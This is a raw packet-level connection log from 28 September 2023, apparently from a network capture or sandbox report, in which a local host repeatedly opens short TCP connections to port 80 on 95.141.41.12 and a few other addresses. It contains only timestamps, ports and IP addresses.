                                                                                              Sep 28, 2023 06:03:29.137552023 CEST5008980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.248588085 CEST5008980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.248991966 CEST5009180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.435863972 CEST805008995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:29.435926914 CEST5008980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.448187113 CEST805009195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:29.448281050 CEST5009180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.448503017 CEST5009180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.648016930 CEST805009195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:29.652467012 CEST805009195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:29.652781963 CEST5009180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.766347885 CEST5009280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.766371965 CEST5009180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.955490112 CEST805009295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:29.955856085 CEST5009280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.956140995 CEST5009280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:29.966612101 CEST805009195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:29.966686010 CEST5009180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.144432068 CEST805009295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:30.150490999 CEST805009295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:30.150753975 CEST5009280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.263767004 CEST5009280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.264206886 CEST5009380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.451423883 CEST805009395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:30.451728106 CEST5009380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.451880932 CEST5009380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.452240944 CEST805009295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:30.452430010 CEST5009280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.639014959 CEST805009395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:30.643241882 CEST805009395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:30.643321991 CEST5009380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.748081923 CEST5009380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.748395920 CEST5009580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.935520887 CEST805009395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:30.935772896 CEST5009380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.941360950 CEST805009595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:30.941560984 CEST5009580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:30.941760063 CEST5009580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.134970903 CEST805009595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:31.139523029 CEST805009595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:31.139617920 CEST5009580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.248055935 CEST5009580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.248569965 CEST5009680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.441394091 CEST805009595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:31.441482067 CEST5009580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.444380045 CEST805009695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:31.444475889 CEST5009680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.444788933 CEST5009680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.640605927 CEST805009695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:31.646167994 CEST805009695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:31.646404028 CEST5009680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.764039993 CEST5009680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.764518023 CEST5009780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.958004951 CEST805009795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:31.958359003 CEST5009780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.958471060 CEST5009780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:31.959920883 CEST805009695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:31.960074902 CEST5009680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.152210951 CEST805009795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:32.156584978 CEST805009795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:32.156697989 CEST5009780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.263910055 CEST5009780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.264130116 CEST5009980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.457922935 CEST805009795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:32.458225012 CEST5009780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.460468054 CEST805009995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:32.460808039 CEST5009980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.460808039 CEST5009980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.658179998 CEST805009995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:32.664899111 CEST805009995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:32.665216923 CEST5009980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.779674053 CEST5009980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.780184984 CEST5010080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.974138021 CEST805010095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:32.974522114 CEST5010080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.974523067 CEST5010080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:32.976366997 CEST805009995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:32.976443052 CEST5009980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.168159008 CEST805010095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:33.172797918 CEST805010095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:33.173098087 CEST5010080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.279028893 CEST5010080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.279344082 CEST5010180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.467196941 CEST805010195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:33.467530966 CEST5010180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.467679024 CEST5010180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.472847939 CEST805010095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:33.473120928 CEST5010080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.654730082 CEST805010195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:33.656708956 CEST805010195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:33.656997919 CEST5010180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.764017105 CEST5010180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.764445066 CEST5010380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.952420950 CEST805010195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:33.952485085 CEST805010395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:33.952647924 CEST5010180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.952676058 CEST5010380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:33.952809095 CEST5010380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.140113115 CEST805010395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:34.141413927 CEST805010395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:34.141758919 CEST5010380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.248204947 CEST5010380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.248694897 CEST5010480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.435415030 CEST805010395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:34.435607910 CEST5010380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.445708990 CEST805010495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:34.445998907 CEST5010480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.446310997 CEST5010480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.643450975 CEST805010495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:34.644306898 CEST805010495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:34.644488096 CEST5010480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.748780966 CEST5010480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.749324083 CEST5010580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.942981005 CEST805010595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:34.943284035 CEST5010580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.943406105 CEST5010580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:34.945787907 CEST805010495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:34.945936918 CEST5010480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.136960030 CEST805010595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:35.137984991 CEST805010595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:35.138117075 CEST5010580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.248341084 CEST5010580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.248941898 CEST5010780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.442549944 CEST805010595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:35.442611933 CEST805010795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:35.442758083 CEST5010580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.442792892 CEST5010780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.442873955 CEST5010780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.636950970 CEST805010795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:35.638204098 CEST805010795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:35.638489008 CEST5010780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.748045921 CEST5010780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.748534918 CEST5010880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.936327934 CEST805010895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:35.936574936 CEST5010880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.938960075 CEST5010880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:35.941114902 CEST805010795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:35.941205025 CEST5010780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.126632929 CEST805010895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:36.127796888 CEST805010895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:36.127985954 CEST5010880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.232479095 CEST5010880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.232964039 CEST5010980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.246783972 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:03:36.246819973 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:03:36.420296907 CEST805010895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:36.420406103 CEST5010880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.426858902 CEST805010995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:36.426935911 CEST5010980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.427124977 CEST5010980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.621257067 CEST805010995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:36.622399092 CEST805010995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:36.622628927 CEST5010980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.637106895 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:03:36.732335091 CEST5010980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.732872963 CEST5011180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.840218067 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:03:36.926667929 CEST805010995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:36.926913023 CEST5010980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.930057049 CEST805011195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:36.930269957 CEST5011180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:36.930327892 CEST5011180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.127660990 CEST805011195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:37.136039972 CEST805011195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:37.136250019 CEST5011180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.248106003 CEST5011180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.248466969 CEST5011280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.340074062 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:03:37.445725918 CEST805011195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:37.445971012 CEST5011180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.453222990 CEST805011295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:37.453530073 CEST5011280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.453610897 CEST5011280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.658591032 CEST805011295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:37.663849115 CEST805011295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:37.663944006 CEST5011280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.779920101 CEST5011280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.780308962 CEST5011380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.840315104 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:03:37.976330996 CEST805011395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:37.976411104 CEST5011380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.976579905 CEST5011380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:37.984751940 CEST805011295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:37.984930992 CEST5011280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:38.173016071 CEST805011395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:38.177320957 CEST805011395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:38.177627087 CEST5011380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:38.294913054 CEST5011380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:38.295254946 CEST5011480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:38.491307974 CEST805011395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:38.491466045 CEST5011380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:38.494865894 CEST805011495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:38.495085001 CEST5011480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:38.495381117 CEST5011480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:38.637145042 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:03:38.694735050 CEST805011495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:38.696113110 CEST805011495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:38.696167946 CEST5011480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:38.810409069 CEST5011480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:38.810858011 CEST5011680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.009124994 CEST805011695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:39.009413004 CEST5011680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.009527922 CEST5011680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.010185957 CEST805011495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:39.010350943 CEST5011480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.207828045 CEST805011695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:39.213162899 CEST805011695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:39.213449001 CEST5011680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.326080084 CEST5011680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.326539040 CEST5011780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.510618925 CEST805011795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:39.510904074 CEST5011780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.511029959 CEST5011780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.528887987 CEST805011695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:39.528980017 CEST5011680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.696027994 CEST805011795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:39.702156067 CEST805011795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:39.702256918 CEST5011780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.810488939 CEST5011780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.810930014 CEST5011880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:39.840264082 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:03:39.996046066 CEST805011795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:39.996336937 CEST5011780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.008718967 CEST805011895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:40.008841038 CEST5011880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.009082079 CEST5011880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.206923008 CEST805011895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:40.211719036 CEST805011895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:40.211838007 CEST5011880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.326241016 CEST5011880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.326600075 CEST5012080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.524555922 CEST805011895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:40.524621010 CEST805012095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:40.524950981 CEST5012080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.524960995 CEST5011880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.525049925 CEST5012080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.723186016 CEST805012095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:40.727718115 CEST805012095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:40.728009939 CEST5012080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.841898918 CEST5012080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:40.842165947 CEST5012180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.036920071 CEST805012195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:41.037250996 CEST5012180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.037548065 CEST5012180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.039704084 CEST805012095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:41.039890051 CEST5012080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.137056112 CEST4979980192.168.2.3192.185.131.188
                                                                                              Sep 28, 2023 06:03:41.231570959 CEST805012195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:41.233316898 CEST805012195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:41.233625889 CEST5012180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.345508099 CEST5012180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.345957994 CEST5012280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.536254883 CEST805012295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:41.536515951 CEST5012280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.536653996 CEST5012280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.539751053 CEST805012195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:41.539993048 CEST5012180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.728025913 CEST805012295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:41.733880997 CEST805012295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:41.734108925 CEST5012280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.841859102 CEST5012280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:41.842334986 CEST5012480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.046833038 CEST805012295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:42.047024965 CEST5012280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.049671888 CEST805012495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:42.049854994 CEST5012480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.050206900 CEST5012480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.241657019 CEST805012495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:42.245417118 CEST805012495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:42.245635033 CEST5012480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.381053925 CEST5012480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.381597042 CEST5012580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.572894096 CEST805012495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:42.573226929 CEST5012480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.578016043 CEST805012595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:42.578253984 CEST5012580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.581013918 CEST5012580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:42.777859926 CEST805012595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:42.781158924 CEST805012595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:42.781558037 CEST5012580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.149321079 CEST5012580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.149857044 CEST5012780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.334820986 CEST805012795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:43.335222960 CEST5012780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.335222960 CEST5012780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.346173048 CEST805012595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:43.346388102 CEST5012580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.519592047 CEST805012795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:43.526103020 CEST805012795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:43.526458025 CEST5012780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.637037992 CEST4980480192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:03:43.638573885 CEST5012780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.638911963 CEST5012880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.822899103 CEST805012795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:43.822978020 CEST5012780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.835710049 CEST805012895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:43.835968971 CEST5012880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:43.836076975 CEST5012880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.033196926 CEST805012895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:44.037734032 CEST805012895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:44.037828922 CEST5012880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.154428959 CEST5012880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.154861927 CEST5012980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.348169088 CEST805012995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:44.348402023 CEST5012980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.348732948 CEST5012980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.351169109 CEST805012895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:44.351317883 CEST5012880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.541678905 CEST805012995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:44.543258905 CEST805012995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:44.543442965 CEST5012980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.654114008 CEST5012980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.654319048 CEST5013080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.850047112 CEST805012995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:44.850099087 CEST805013095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:44.850238085 CEST5012980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.850405931 CEST5013080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:44.850405931 CEST5013080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.045448065 CEST805013095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:45.046673059 CEST805013095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:45.047076941 CEST5013080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.154373884 CEST5013080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.154880047 CEST5013280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:45.350485086 CEST805013095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:45.350703955 CEST5013080192.168.2.395.141.41.12
